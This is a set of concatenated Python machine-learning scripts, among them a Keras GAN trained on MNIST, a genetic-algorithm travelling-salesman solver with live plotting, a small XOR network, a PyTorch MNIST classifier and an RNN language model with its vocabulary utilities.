        self.D.add(LeakyReLU(0.2))
        self.D.add(Dropout(dropout))
        self.D.add(Conv2D(depth*2, 5, strides=2, padding="same"))
        self.D.add(LeakyReLU(0.2))
        self.D.add(Dropout(dropout))
        self.D.add(Conv2D(depth*4, 5, strides=2, padding="same"))
        self.D.add(LeakyReLU(0.2))
        self.D.add(Dropout(dropout))
        self.D.add(Conv2D(depth*8, 5, strides=1, padding="same"))
        self.D.add(LeakyReLU(0.2))
        self.D.add(Dropout(dropout))
        # convert to 1 dimension
        self.D.add(Flatten())
        self.D.add(Dense(1, activation="sigmoid"))
        print("="*50, "Discriminator", "="*50)
        self.D.summary()
        return self.D
    def generator(self):
        """Build (once) and return the generator: 100-d noise -> image.
        Dense reshape to (7, 7, 256), then upsample/deconv to (28, 28, 1)."""
        if self.G:
            return self.G
        self.G = Sequential()
        dropout = 0.4
        # covnerting from 100 vector noise to dim x dim x depth
        # (100,) to (7, 7, 256)
        depth = 64 * 4
        dim = 7
        self.G.add(Dense(dim*dim*depth, input_dim=100))
        self.G.add(BatchNormalization(momentum=0.9))
        self.G.add(Activation("relu"))
        self.G.add(Reshape((dim, dim, depth)))
        self.G.add(Dropout(dropout))
        # upsampling to (14, 14, 128)
        self.G.add(UpSampling2D())
        self.G.add(Conv2DTranspose(depth // 2, 5, padding="same"))
        self.G.add(BatchNormalization(momentum=0.9))
        self.G.add(Activation("relu"))
        self.G.add(Dropout(dropout))
        # up to (28, 28, 64)
        self.G.add(UpSampling2D())
        self.G.add(Conv2DTranspose(depth // 4, 5, padding="same"))
        self.G.add(BatchNormalization(momentum=0.9))
        self.G.add(Activation("relu"))
        self.G.add(Dropout(dropout))
        # to (28, 28, 32)
        self.G.add(Conv2DTranspose(depth // 8, 5, padding="same"))
        self.G.add(BatchNormalization(momentum=0.9))
        self.G.add(Activation("relu"))
        self.G.add(Dropout(dropout))
        # to (28, 28, 1) (img)
        self.G.add(Conv2DTranspose(1, 5, padding="same"))
        self.G.add(Activation("sigmoid"))
        print("="*50, "Generator", "="*50)
        self.G.summary()
        return self.G
    def discriminator_model(self):
        """Build (once) and return the compiled discriminator training model."""
        if self.DM:
            return self.DM
        # optimizer = RMSprop(lr=0.001, decay=6e-8)
        optimizer = Adam(0.0002, 0.5)
        self.DM = Sequential()
        self.DM.add(self.discriminator())
        self.DM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
        return self.DM
    def adversarial_model(self):
        """Build (once) and return the compiled stacked model
        (generator -> discriminator) used to train the generator."""
        if self.AM:
            return self.AM
        # optimizer = RMSprop(lr=0.001, decay=3e-8)
        optimizer = Adam(0.0002, 0.5)
        self.AM = Sequential()
        self.AM.add(self.generator())
        self.AM.add(self.discriminator())
        self.AM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
        return self.AM
class MNIST:
    """Trains the GAN defined above on the MNIST digit dataset and renders
    4x4 grids of generated / real digits for visual inspection."""
    def __init__(self):
        # image dimensions: 28x28 grayscale (1 channel)
        self.img_x = 28
        self.img_y = 28
        self.img_z = 1
        # training step to resume from (restored from a checkpoint filename)
        self.steps = 0
        self.load_data()
        self.create_models()
        # used image indices
        self._used_indices = set()
    def load_data(self):
        """Load MNIST and add a trailing channel axis to the image arrays."""
        (self.X_train, self.y_train), (self.X_test, self.y_test) = mnist.load_data()
        # reshape to (num_samples, 28, 28 , 1)
        self.X_train = np.expand_dims(self.X_train, axis=-1)
        self.X_test = np.expand_dims(self.X_test, axis=-1)
    def create_models(self):
        """Build the three GAN models and resume from any *.h5 checkpoints
        found in the working directory (first glob match wins)."""
        self.GAN = GAN()
        self.discriminator = self.GAN.discriminator_model()
        self.adversarial = self.GAN.adversarial_model()
        self.generator = self.GAN.generator()
        discriminators = glob.glob("discriminator_*.h5")
        generators = glob.glob("generator_*.h5")
        adversarial = glob.glob("adversarial_*.h5")
        if len(discriminators) != 0:
            print("[+] Found a discriminator ! Loading weights ...")
            self.discriminator.load_weights(discriminators[0])
        if len(generators) != 0:
            print("[+] Found a generator ! Loading weights ...")
            self.generator.load_weights(generators[0])
        if len(adversarial) != 0:
            print("[+] Found an adversarial model ! Loading weights ...")
            # the step counter is encoded in the checkpoint filename
            self.steps = int(adversarial[0].replace("adversarial_", "").replace(".h5", ""))
            self.adversarial.load_weights(adversarial[0])
    def get_unique_random(self, batch_size=256):
        """Return `batch_size` random training-image indices.

        NOTE(review): despite the name, uniqueness tracking is commented out
        below, so indices may repeat across (and within) batches.
        """
        indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
        # in_used_indices = np.any([i in indices for i in self._used_indices])
        # while in_used_indices:
        # indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
        # in_used_indices = np.any([i in indices for i in self._used_indices])
        # self._used_indices |= set(indices)
        # if len(self._used_indices) > self.X_train.shape[0] // 2:
        # if used indices is more than half of training samples, clear it
        # that is to enforce it to train at least more than half of the dataset uniquely
        # self._used_indices.clear()
        return indices
    def train(self, train_steps=2000, batch_size=256, save_interval=0):
        """Alternate discriminator and adversarial updates for
        `train_steps` steps, optionally saving samples/weights every
        `save_interval` steps."""
        noise_input = None
        # resume from self.steps when checkpoints were loaded
        steps = tqdm.tqdm(list(range(self.steps, train_steps)))
        # label tensors: 0 = fake, 1 = real
        fake = np.zeros((batch_size, 1))
        real = np.ones((batch_size, 1))
        for i in steps:
            real_images = self.X_train[self.get_unique_random(batch_size)]
            # noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
            noise = np.random.normal(size=(batch_size, 100))
            fake_images = self.generator.predict(noise)
            # get 256 real images and 256 fake images
            d_loss_real = self.discriminator.train_on_batch(real_images, real)
            d_loss_fake = self.discriminator.train_on_batch(fake_images, fake)
            # average the two discriminator losses for reporting
            d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
            # X = np.concatenate((real_images, fake_images))
            # y = np.zeros((2*batch_size, 1))
            # 0 for fake and 1 for real
            # y[:batch_size, :] = 1
            # shuffle
            # shuffle_in_unison(X, y)
            # d_loss = self.discriminator.train_on_batch(X, y)
            # y = np.ones((batch_size, 1))
            # noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
            # fool the adversarial, telling him everything is real
            a_loss = self.adversarial.train_on_batch(noise, real)
            log_msg = f"[D loss: {d_loss[0]:.6f}, D acc: {d_loss[1]:.6f} | A loss: {a_loss[0]:.6f}, A acc: {a_loss[1]:.6f}]"
            steps.set_description(log_msg)
            if save_interval > 0:
                # fresh noise each step; only plotted on save steps
                noise_input = np.random.uniform(low=-1, high=1.0, size=(16, 100))
                if (i + 1) % save_interval == 0:
                    self.plot_images(save2file=True, samples=noise_input.shape[0], noise=noise_input, step=(i+1))
                    self.discriminator.save(f"discriminator_{i+1}.h5")
                    self.generator.save(f"generator_{i+1}.h5")
                    self.adversarial.save(f"adversarial_{i+1}.h5")
    def plot_images(self, save2file=False, fake=True, samples=16, noise=None, step=0):
        """Render a 4x4 grid of generated (fake=True) or real MNIST images,
        saving to a PNG when save2file is set, otherwise showing it."""
        filename = "mnist_fake.png"
        if fake:
            if noise is None:
                noise = np.random.uniform(-1.0, 1.0, size=(samples, 100))
            else:
                # noise supplied by train(): tag the file with the step
                filename = f"mnist_{step}.png"
            images = self.generator.predict(noise)
        else:
            i = np.random.randint(0, self.X_train.shape[0], samples)
            images = self.X_train[i]
            if noise is None:
                filename = "mnist_real.png"
        plt.figure(figsize=(10, 10))
        for i in range(images.shape[0]):
            plt.subplot(4, 4, i+1)
            image = images[i]
            image = np.reshape(image, (self.img_x, self.img_y))
            plt.imshow(image, cmap="gray")
            plt.axis("off")
        plt.tight_layout()
        if save2file:
            plt.savefig(filename)
            plt.close("all")
        else:
            plt.show()
# https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison
def shuffle_in_unison(a, b):
    """Shuffle arrays *a* and *b* in place with the same permutation.

    Snapshotting the RNG state before the first shuffle and rewinding it
    before the second makes both calls draw the identical swap sequence,
    so row pairing between the two arrays is preserved.
    """
    snapshot = np.random.get_state()
    np.random.shuffle(a)
    # rewind the generator so b receives the exact same permutation
    np.random.set_state(snapshot)
    np.random.shuffle(b)
if __name__ == "__main__":
    # train the GAN on MNIST, checkpointing every 500 steps,
    # then save one grid of generated digits and one of real digits
    mnist_gan = MNIST()
    mnist_gan.train(train_steps=10000, batch_size=256, save_interval=500)
    mnist_gan.plot_images(fake=True, save2file=True)
    mnist_gan.plot_images(fake=False, save2file=True)
import random
import numpy as np
import pandas as pd
import operator
import matplotlib.pyplot as plt
from threading import Event, Thread
class Individual:
    """Mutable holder for the current best individual, shared with the
    animation thread so plot updates can observe each new route."""
    def __init__(self, object):
        # parameter name kept for backward compatibility even though it
        # shadows the builtin `object`
        self.object = object
    def update(self, new):
        """Replace the wrapped individual with *new*."""
        self.object = new
    def __repr__(self):
        # bug fix: __repr__ must return a str; the wrapped individual is
        # typically a list (a route), so returning it directly raised
        # "TypeError: __repr__ returned non-string"
        return repr(self.object)
    def __str__(self):
        return str(self.object)
class GeneticAlgorithm:
    """General purpose genetic algorithm implementation.

    Individuals are permutations of the `individual` sequence passed to the
    constructor; `fitness_func` must return a value where larger is better.
    Throughout this class, reported "distance" is computed as 1 / fitness,
    so the supplied fitness is assumed to be a reciprocal of a cost.
    """
    def __init__(self, individual, popsize, elite_size, mutation_rate, generations, fitness_func, plot=True, prn=True, animation_func=None):
        # template individual whose permutations form the population
        self.individual = individual
        self.popsize = popsize
        # number of top individuals copied unchanged into each generation
        self.elite_size = elite_size
        # per-gene swap probability during mutation
        self.mutation_rate = mutation_rate
        self.generations = generations
        if not callable(fitness_func):
            raise TypeError("fitness_func must be a callable object.")
        self.get_fitness = fitness_func
        self.plot = plot
        self.prn = prn
        self.population = self._init_pop()
        # optional callable(individual, progress, stop_event, plot_conclusion=...)
        self.animate = animation_func
    def calc(self):
        """Evolve the population and return
        (initial_route, final_route, distance).

        If an animation function was supplied, it is started in its own
        thread and fed the best individual of each generation; a Ctrl-C
        stops evolution early but still returns the best result so far.
        NOTE(review): `population` is only bound inside the loop, so a
        KeyboardInterrupt before the first generation would raise
        NameError at the `final_route` lookup.
        """
        sorted_pop = self.sortpop()
        initial_route = self.population[sorted_pop[0][0]]
        # fitness is 1/distance, so invert to report distance
        distance = 1 / sorted_pop[0][1]
        progress = [ distance ]
        if callable(self.animate):
            self.plot = True
            individual = Individual(initial_route)
            stop_animation = Event()
            self.animate(individual, progress, stop_animation, plot_conclusion=initial_route)
        else:
            self.plot = False
        if self.prn:
            print(f"Initial distance: {distance}")
        try:
            if self.plot:
                for i in range(self.generations):
                    population = self.next_gen()
                    sorted_pop = self.sortpop()
                    distance = 1 / sorted_pop[0][1]
                    progress.append(distance)
                    if self.prn:
                        print(f"[Generation:{i}] Current distance: {distance}")
                    # publish the generation's best route to the animator
                    route = population[sorted_pop[0][0]]
                    individual.update(route)
            else:
                for i in range(self.generations):
                    population = self.next_gen()
                    distance = 1 / self.sortpop()[0][1]
                    if self.prn:
                        print(f"[Generation:{i}] Current distance: {distance}")
        except KeyboardInterrupt:
            pass
        try:
            # stop_animation only exists when an animator was started
            stop_animation.set()
        except NameError:
            pass
        final_route_index = self.sortpop()[0][0]
        final_route = population[final_route_index]
        if self.prn:
            print("Final route:", final_route)
        return initial_route, final_route, distance
    def create_population(self):
        """Return one individual: a random permutation of the template."""
        return random.sample(self.individual, len(self.individual))
    def _init_pop(self):
        # popsize independent random permutations
        return [ self.create_population() for i in range(self.popsize) ]
    def sortpop(self):
        """This function calculates the fitness of each individual in population
        And returns a population sorted by its fitness in descending order
        as (index, fitness) pairs."""
        result = [ (i, self.get_fitness(individual)) for i, individual in enumerate(self.population) ]
        return sorted(result, key=operator.itemgetter(1), reverse=True)
    def selection(self):
        """Fitness-proportionate (roulette-wheel) selection with elitism.

        The elite_size best individuals are always kept; the rest are drawn
        with probability proportional to cumulative fitness percentage.
        """
        sorted_pop = self.sortpop()
        df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
        df['cum_sum'] = df['Fitness'].cumsum()
        df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
        result = [ sorted_pop[i][0] for i in range(self.elite_size) ]
        for i in range(len(sorted_pop) - self.elite_size):
            pick = random.random() * 100
            for i in range(len(sorted_pop)):
                if pick <= df['cum_perc'][i]:
                    result.append(sorted_pop[i][0])
                    break
        return [ self.population[index] for index in result ]
    def breed(self, parent1, parent2):
        """Ordered crossover: copy a random slice of parent1, then fill the
        rest with parent2's genes in order, skipping duplicates."""
        child1, child2 = [], []
        gene_A = random.randint(0, len(parent1))
        gene_B = random.randint(0, len(parent2))
        start_gene = min(gene_A, gene_B)
        end_gene = max(gene_A, gene_B)
        for i in range(start_gene, end_gene):
            child1.append(parent1[i])
        child2 = [ item for item in parent2 if item not in child1 ]
        return child1 + child2
    def breed_population(self, selection):
        """Carry the elite through unchanged and breed the rest pairwise
        from a shuffled mating pool (i-th with mirror-image partner)."""
        pool = random.sample(selection, len(selection))
        children = [selection[i] for i in range(self.elite_size)]
        children.extend([self.breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - self.elite_size)])
        return children
    def mutate(self, individual):
        """Swap mutation: each position swaps with a random one with
        probability mutation_rate (in place)."""
        individual_length = len(individual)
        for swapped in range(individual_length):
            if(random.random() < self.mutation_rate):
                swap_with = random.randint(0, individual_length-1)
                individual[swapped], individual[swap_with] = individual[swap_with], individual[swapped]
        return individual
    def mutate_population(self, children):
        # NOTE: mutation is also applied to the elite individuals here
        return [ self.mutate(individual) for individual in children ]
    def next_gen(self):
        """Advance one generation: selection -> crossover -> mutation."""
        selection = self.selection()
        children = self.breed_population(selection)
        self.population = self.mutate_population(children)
        return self.population
from genetic import plt
from genetic import Individual
from threading import Thread
def plot_routes(initial_route, final_route):
    """Draw the initial and final routes side by side and show the figure."""
    _, axes = plt.subplots(nrows=1, ncols=2)
    panels = (("Initial Route", initial_route), ("Final Route", final_route))
    for axis, (title, route) in zip(axes, panels):
        axis.title.set_text(title)
        start, *rest = route
        # mark the starting city in green with a "Start" label
        axis.text(start.x - 5, start.y + 5, "Start")
        axis.scatter(start.x, start.y, s=70, c='g')
        for city in rest:
            axis.scatter(city.x, city.y, s=70, c='b')
        # connect cities in visiting order, then close the tour
        axis.plot([c.x for c in route], [c.y for c in route], c='r')
        axis.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
    plt.show()
def animate_progress(route, progress, stop_animation, plot_conclusion=None):
    """Start a background thread that live-plots the evolving route and the
    distance-per-generation curve until `stop_animation` is set.

    :param route: Individual wrapper holding the current best route
    :param progress: shared list of distances, appended to by the GA loop
    :param stop_animation: threading.Event that ends the animation loop
    :param plot_conclusion: initial route; when given, a final side-by-side
        comparison is drawn after the loop ends
    """
    def animate():
        # `route` is rebound by the caller via Individual.update(); nonlocal
        # keeps this closure reading the caller's variable
        nonlocal route
        _, ax1 = plt.subplots(nrows=1, ncols=2)
        while True:
            if isinstance(route, Individual):
                target = route.object
                ax1[0].clear()
                ax1[1].clear()
                # current routes and cities
                ax1[0].title.set_text("Current routes")
                for i, city in enumerate(target):
                    if i == 0:
                        ax1[0].text(city.x-5, city.y+5, "Start")
                        ax1[0].scatter(city.x, city.y, s=70, c='g')
                    else:
                        ax1[0].scatter(city.x, city.y, s=70, c='b')
                ax1[0].plot([ city.x for city in target ], [city.y for city in target], c='r')
                ax1[0].plot([target[-1].x, target[0].x], [target[-1].y, target[0].y], c='r')
                # current distance graph
                ax1[1].title.set_text("Current distance")
                ax1[1].plot(progress)
                ax1[1].set_ylabel("Distance")
                ax1[1].set_xlabel("Generation")
                # pause also flushes the GUI event loop
                plt.pause(0.05)
                if stop_animation.is_set():
                    break
        plt.show()
        if plot_conclusion:
            initial_route = plot_conclusion
            # NOTE(review): `target` is only bound if the loop body ran at
            # least once with an Individual — assumed true in practice
            plot_routes(initial_route, target)
    Thread(target=animate).start()
import matplotlib.pyplot as plt
import random
import numpy as np
import operator
from plots import animate_progress, plot_routes
class City:
    """A point in the 2-D plane; city-to-city distance is Euclidean."""
    def __init__(self, x, y):
        self.x = x
        self.y = y
    def distance(self, city):
        """Return the Euclidean distance between this city and *city*."""
        return np.sqrt((self.x - city.x) ** 2 + (self.y - city.y) ** 2)
    def __sub__(self, city):
        # `a - b` reads as "distance from a to b"
        return self.distance(city)
    def __repr__(self):
        return f"({self.x}, {self.y})"
    def __str__(self):
        return self.__repr__()
def get_fitness(route):
    """Fitness of a tour = 1 / total closed-loop length.

    Consecutive cities are measured with their `-` operator and the tour
    wraps around from the last city back to the first.
    """
    total = 0
    for idx, origin in enumerate(route):
        stop = route[(idx + 1) % len(route)]
        total += origin - stop
    return 1 / total
def load_cities():
    """Return the fixed benchmark tour of 26 cities.

    Note the first and last coordinates repeat, as in the original data.
    """
    coords = [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)]
    return [City(x, y) for x, y in coords]
def generate_cities(size):
    """Generate *size* random cities pushed toward the border of a 200x200
    square: a point whose x falls in the central band gets its y pinned to
    an edge strip (and vice versa), producing a ring-like layout."""
    cities = []
    for _ in range(size):
        x = random.randint(0, 200)
        y = random.randint(0, 200)
        if 40 < x < 160:
            # x is central: pin y to the bottom or top strip
            y = random.randint(0, 40) if 0.5 <= random.random() else random.randint(160, 200)
        elif 40 < y < 160:
            # y is central: pin x to the left or right strip
            x = random.randint(0, 40) if 0.5 <= random.random() else random.randint(160, 200)
        cities.append(City(x, y))
    return cities
def benchmark(cities):
    """Grid-search GA hyperparameters on *cities* and print, for each
    combination, how many generations were needed (or that the budget of
    1200 generations was exhausted), then a summary sorted by generations.

    NOTE(review): this calls `gen.calc(ret=("generation", 755))`, but the
    `GeneticAlgorithm.calc` defined in this file takes no `ret` argument
    and returns (initial_route, final_route, distance) — this appears to
    target a different version of the genetic module; confirm before use.
    NOTE(review): `GeneticAlgorithm` is only imported under __main__ below,
    so calling benchmark() without that import raises NameError.
    """
    popsizes = [60, 80, 100, 120, 140]
    elite_sizes = [5, 10, 20, 30, 40]
    mutation_rates = [0.02, 0.01, 0.005, 0.003, 0.001]
    generations = 1200
    iterations = len(popsizes) * len(elite_sizes) * len(mutation_rates)
    iteration = 0
    gens = {}
    for popsize in popsizes:
        for elite_size in elite_sizes:
            for mutation_rate in mutation_rates:
                iteration += 1
                gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, prn=False)
                initial_route, final_route, generation = gen.calc(ret=("generation", 755))
                if generation == generations:
                    print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): could not reach the solution")
                else:
                    print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): {generation} generations was enough")
                if generation != generations:
                    gens[iteration] = generation
    # reversed_gen = {v:k for k, v in gens.items()}
    # print successful combinations, fastest first
    output = sorted(gens.items(), key=operator.itemgetter(1))
    for i, gens in output:
        print(f"Iteration: {i} generations: {gens}")
# [1] (popsize=60, elite_size=30, mutation_rate=0.001): 235 generations was enough
# [2] (popsize=80, elite_size=20, mutation_rate=0.001): 206 generations was enough
# [3] (popsize=100, elite_size=30, mutation_rate=0.001): 138 generations was enough
# [4] (popsize=120, elite_size=30, mutation_rate=0.002): 117 generations was enough
# [5] (popsize=140, elite_size=20, mutation_rate=0.003): 134 generations was enough
# The notes:
# 1.1 Increasing the mutation rate to higher rate, the curve will be inconsistent and it won't lead us to the optimal distance.
# 1.2 So we need to put it as small as 1% or lower
# 2. Elite size is likely to be about 30% or less of total population
# 3. Generations depends on the other parameters, can be a fixed number, or until we reach the optimal distance.
# 4.
if __name__ == "__main__":
    from genetic import GeneticAlgorithm
    cities = load_cities()
    # cities = generate_cities(50)
    # parameters
    popsize = 120
    elite_size = 30
    # NOTE(review): 0.1 is far above the <=0.01 the benchmark notes above
    # recommend — confirm this is intentional
    mutation_rate = 0.1
    generations = 400
    # run the GA with the live animation thread attached
    gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, animation_func=animate_progress)
    initial_route, final_route, distance = gen.calc()
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import re
import numpy as np
import os
import time
import json
from glob import glob
from PIL import Image
import pickle
import numpy as np
from keras.utils import np_utils
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
# train a tiny dense network to learn XOR (labels one-hot over 2 classes)
np.random.seed(19)
X = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')
y = np.array([[0],[1],[1],[0]]).astype('float32')
y = np_utils.to_categorical(y)
xor = Sequential()
# add required layers
xor.add(Dense(8, input_dim=2))
# hyperbolic tangent function to the first hidden layer ( 8 nodes )
xor.add(Activation("tanh"))
xor.add(Dense(8))
xor.add(Activation("relu"))
# output layer
xor.add(Dense(2))
# sigmoid function to the output layer ( final )
xor.add(Activation("sigmoid"))
# Cross-entropy error function
xor.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
# show the summary of the model
xor.summary()
xor.fit(X, y, epochs=400, verbose=1)
# accuracy on the 4 training points (score[-1] is the accuracy metric)
score = xor.evaluate(X, y)
print(f"Accuracy: {score[-1]}")
# Checking the predictions
print("\nPredictions:")
print(xor.predict(X))
import torch
import torchvision
from torchvision import transforms, datasets
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
# training hyperparameters for the PyTorch MNIST classifier below
epochs = 3        # full passes over the training set
batch_size = 64   # samples per gradient step
# building the network now
class Net(nn.Module):
    """Fully-connected MNIST classifier: 784 -> 64 -> 64 -> 64 -> 10."""
    def __init__(self):
        super().__init__()
        # takes 28x28 images, flattened to 784 features by the caller
        self.fc1 = nn.Linear(28*28, 64)
        self.fc2 = nn.Linear(64, 64)
        self.fc3 = nn.Linear(64, 64)
        self.fc4 = nn.Linear(64, 10)
    def forward(self, x):
        # three ReLU hidden layers, then log-probabilities over the digits
        for hidden in (self.fc1, self.fc2, self.fc3):
            x = F.relu(hidden(x))
        return F.log_softmax(self.fc4(x), dim=1)
if __name__ == "__main__":
    # download (if needed) and wrap MNIST as tensors
    training_set = datasets.MNIST("", train=True, download=True,
                                  transform=transforms.Compose([
                                      transforms.ToTensor()
                                  ]))
    test_set = datasets.MNIST("", train=False, download=True,
                              transform=transforms.Compose([
                                  transforms.ToTensor()
                              ]))
    # load the dataset
    train = torch.utils.data.DataLoader(training_set, batch_size=batch_size, shuffle=True)
    test = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False)
    # construct the model
    net = Net()
    # specify the loss and optimizer
    # NOTE(review): this CrossEntropyLoss instance is never used — the loop
    # below rebinds `loss` to F.nll_loss(...) each batch
    loss = nn.CrossEntropyLoss()
    optimizer = optim.Adam(net.parameters(), lr=0.001)
    # training the model
    for epoch in range(epochs):
        for data in train:
            # data is the batch of data now
            # X are the features, y are labels
            X, y = data
            net.zero_grad() # set gradients to 0 before loss calculation
            output = net(X.view(-1, 28*28)) # feed data to the network
            loss = F.nll_loss(output, y) # calculating the negative log likelihood
            loss.backward() # back propagation
            optimizer.step() # attempt to optimize weights to account for loss/gradients
        # loss of the last batch of the epoch
        print(loss)
    # evaluate accuracy on the held-out test set (no gradients needed)
    correct = 0
    total = 0
    with torch.no_grad():
        for data in test:
            X, y = data
            output = net(X.view(-1, 28*28))
            for index, i in enumerate(output):
                if torch.argmax(i) == y[index]:
                    correct += 1
                total += 1
    print("Accuracy:", round(correct / total, 3))
    # testing: show the prediction and image for the first sample
    # of the last test batch
    print(torch.argmax(net(X.view(-1, 28*28))[0]))
    plt.imshow(X[0].view(28, 28))
    plt.show()
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed
from keras.layers import Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, batch_normalization=True, bidirectional=True):
    """Stack `num_layers` recurrent layers (optionally bidirectional, each
    optionally followed by BatchNorm, always by Dropout and LeakyReLU) and
    finish with a TimeDistributed softmax of width `input_dim`.

    :param input_dim: feature size per timestep (also the output width)
    :param cell: recurrent layer class, e.g. LSTM or GRU
    """
    model = Sequential()
    for layer_index in range(num_layers):
        if layer_index == 0:
            # only the first layer declares the input shape
            recurrent = cell(units, input_shape=(None, input_dim), return_sequences=True)
        else:
            recurrent = cell(units, return_sequences=True)
        model.add(Bidirectional(recurrent) if bidirectional else recurrent)
        if batch_normalization:
            model.add(BatchNormalization())
        model.add(Dropout(dropout))
        model.add(LeakyReLU(alpha=0.1))
    model.add(TimeDistributed(Dense(input_dim, activation="softmax")))
    return model
from utils import UNK, text_to_sequence, sequence_to_text
from keras.preprocessing.sequence import pad_sequences
from keras.layers import LSTM
from models import rnn_model
from scipy.ndimage.interpolation import shift
import numpy as np
# to use CPU
import os
# hide all GPUs from TensorFlow so this script runs on CPU only
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# NOTE(review): tf.ConfigProto is the TF1.x API, and this config object is
# built but never passed to a session — confirm it has any effect here
config = tf.ConfigProto(intra_op_parallelism_threads=6,
                        inter_op_parallelism_threads=6,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
# ad-hoc smoke test: feed a fixed prompt through the trained language model
# and print the raw prediction outputs
INPUT_DIM = 50
test_text = ""
test_text += """college or good clerk at university has not pleasant days or used not to have them half a century ago but his position was recognized and the misery was measured can we just make something that is useful for making this happen especially when they are just doing it by"""
# encode the prompt to word ids, then shape it (1, 1, seq_len) for the RNN
encoded = np.expand_dims(np.array(text_to_sequence(test_text)), axis=0)
encoded = encoded.reshape((-1, encoded.shape[0], encoded.shape[1]))
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.load_weights("results/lm_rnn_v2_6400548.3.h5")
# for i in range(10):
# predicted_word_int = model.predict_classes(encoded)[0]
# print(predicted_word_int, end=',')
# word = sequence_to_text(predicted_word_int)
# encoded = shift(encoded, -1, cval=predicted_word_int)
# print(word, end=' ')
print("Fed:")
print(encoded)
print("Result: predict")
print(model.predict(encoded)[0])
print("Result: predict_proba")
print(model.predict_proba(encoded)[0])
print("Result: predict_classes")
print(model.predict_classes(encoded)[0])
print(sequence_to_text(model.predict_classes(encoded)[0]))
print()
from models import rnn_model
from utils import sequence_to_text, text_to_sequence, get_batches, get_data, get_text, vocab
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
import numpy as np
import os
# train the RNN language model on the concatenated corpus in data/
INPUT_DIM = 50
# OUTPUT_DIM = len(vocab)
BATCH_SIZE = 128
# get data
text = get_text("data")
encoded = np.array(text_to_sequence(text))
print(len(encoded))
# X, y = get_data(encoded, INPUT_DIM, 1)
# del text, encoded
model = rnn_model(INPUT_DIM, LSTM, 4, 380, 0.3, bidirectional=False)
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
model.summary()
if not os.path.isdir("results"):
    os.mkdir("results")
# checkpoint after every epoch, loss encoded in the filename
checkpointer = ModelCheckpoint("results/lm_rnn_v2_{loss:.1f}.h5", verbose=1)
# // 100: only a hundredth of the corpus per epoch
steps_per_epoch = (len(encoded) // 100) // BATCH_SIZE
model.fit_generator(get_batches(encoded, BATCH_SIZE, INPUT_DIM),
                    epochs=100,
                    callbacks=[checkpointer],
                    verbose=1,
                    steps_per_epoch=steps_per_epoch)
model.save("results/lm_rnn_v2_final.h5")
import numpy as np
import os
import tqdm
import inflect
from string import punctuation, whitespace
from word_forms.word_forms import get_word_forms
# number-to-words engine used by get_text() below
p = inflect.engine()
# token substituted for any out-of-vocabulary word
UNK = "<unk>"
vocab = set()
add = vocab.add
# add unk
add(UNK)
# seed the vocabulary from the saved word list
with open("data/vocab1.txt") as f:
    for line in f:
        add(line.strip())
# NOTE: from here on `vocab` is a sorted *list*, not a set
vocab = sorted(vocab)
# bidirectional word <-> id lookup tables
word2int = {w: i for i, w in enumerate(vocab)}
int2word = {i: w for i, w in enumerate(vocab)}
def update_vocab(word):
    """Register *word* in the global vocab and both lookup tables.

    Bug fix: module-level `vocab` is a sorted *list* (it is rebound with
    `vocab = sorted(vocab)` above), so the previous `vocab.add(word)`
    raised AttributeError — lists need `append`.  Also skips words that
    are already known so existing ids stay stable.
    """
    global vocab
    global word2int
    global int2word
    if word in word2int:
        return  # already registered; keep its id unchanged
    vocab.append(word)
    # assign the next free integer id
    next_int = max(int2word) + 1
    word2int[word] = next_int
    int2word[next_int] = word
def save_vocab(_vocab):
    """Write the vocabulary to vocab1.txt, one word per line, sorted."""
    with open("vocab1.txt", "w") as f:
        for word in sorted(_vocab):
            f.write(word + "\n")
def text_to_sequence(text):
    """Map a whitespace-separated string to a list of word ids."""
    return list(map(word2int.__getitem__, text.split()))
def sequence_to_text(seq):
    """Map an iterable of word ids back to a space-joined string."""
    return ' '.join(int2word[index] for index in seq)
def get_batches(arr, batch_size, n_steps):
    '''Endlessly yield (x, y) batches of shape (1, batch_size, n_steps).

    The array is trimmed to a whole number of batches and laid out as
    `batch_size` parallel streams; y is x shifted one step left, with the
    final target column (which has no successor) zero-padded.

    Arguments
    ---------
